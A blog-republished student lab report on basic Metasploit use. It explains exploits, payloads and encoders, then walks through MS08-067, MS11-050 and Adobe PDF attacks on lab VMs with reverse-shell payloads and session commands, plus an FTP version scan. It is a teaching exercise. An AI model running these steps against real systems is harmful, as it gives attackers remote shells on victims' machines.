首页 技术 正文
技术 2022年11月23日
0 收藏 663 点赞 3,707 浏览 1804 个字

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

基础问题回答

1.用自己的话解释什么是exploit,payload,encode?

exploit就相当于是就是渗透攻击,其实就是针对各种服务、系统的漏洞进行攻击(传送某种攻击)。

payload就相当于攻击载荷,我们实验中做过shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。较小的代码就作为独立体,较大的代码需要一个传输器,建立某种联系,使得不会因攻击代码过长而被发现。

encode就是编码,它主要是为了避免之前的payload中出现坏字符;其次是为了实现免杀,不让杀毒软件轻易发现payload是攻击代码。

实践内容

因为电脑实在太卡所以很抱歉很多图片都是拍的

1.主动攻击:ms08_067漏洞攻击

靶机:WinXPenSP3 ip:192.168.205.129

先用search ms08_067指令查询一下针对该漏洞可以运用的攻击模块:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

用use exploit/windows/smb/ms08_067_netapi使用该模块,再使用show payloads查看可以供我们使用的payload:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

设置完相应的参数后,再次使用show options对攻击的选项进行查看。

接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

(因为几度卡死,kali在硬盘里,强制关机开机损坏了硬盘相关扇区,导致电脑无法读取硬盘数据,下载了检测修复软件,但是要格式化,准备找boot引导区代码自己尝试修复,所以先借同学电脑完成)

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

2.对浏览器攻击:ms11_050漏洞攻击

靶机:WinXPattacker ip:192.168.205.129

基本步骤还是和上面一样,先利用search ms11_050指令查看可以运用的攻击模块

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

设置好参数后,进行查看:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

使用exploit指令执行漏洞,可以看到生成了一个url:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功,使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

使用sessions -i 1选择会话1,成功获取了靶机的shell,利用systeminfo指令查看靶机的系统信息:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

3.对Adobe的漏洞攻击:adobe_pdf_embedded_exe、adobe_toolbutton

靶机:WinXPenSP3

查看Adobe靶机

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

先使用search adobe查询和adobe漏洞有关的模块,我选择的是exploit/windows/fileformat/adobe_pdf_embedded_exe,然后使用该模块,设置回连的payload:

查看需要设置的参数:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个5231.pdf文件:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

然后将该文件传送到靶机上,并且在攻击机上打开监听,将靶机中的pdf文件打开,但是,阅读器一直说这个文件类型不支持用adobe打开(可能是不同漏洞操作不太相同?),然后还是换了一个漏洞:adobe_toolbutton,按照相同步骤,成功获取靶机shell和系统信息:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

4.辅助模块的应用:ftp_version

靶机:WinXPenSP3 ip:192.168.205.129

使用show auxiliary查看可以运用的辅助模块:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

我使用的是scanner/ftp/ftp_version,用来对靶机的ftp版本进行扫描,设置靶机的IP地址:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

使用exploit指令开始扫描,成功扫描到靶机的ftp版本:

20145231熊梓宏 《网络对抗》 实验5 MSF基础应用

实践体会

出现问题,解决问题。硬盘还没有修复好,心痛。

微信扫一扫

支付宝扫一扫

本文网址:https://www.zhankr.net/141874.html

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:876 阅读:5,475
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:806 阅读:3,696
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:565 阅读:4,511
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:731 阅读:4,472
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:5,389
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:3,268
发表评论
暂无评论

还没有评论呢,快来抢沙发~

助力内容变现

将您的收入提升到一个新的水平

点击联系客服

在线时间:8:00-16:00

客服电话

400-888-8888

客服邮箱

ceotheme@ceo.com

扫描二维码

关注微信公众号

扫描二维码

手机访问本站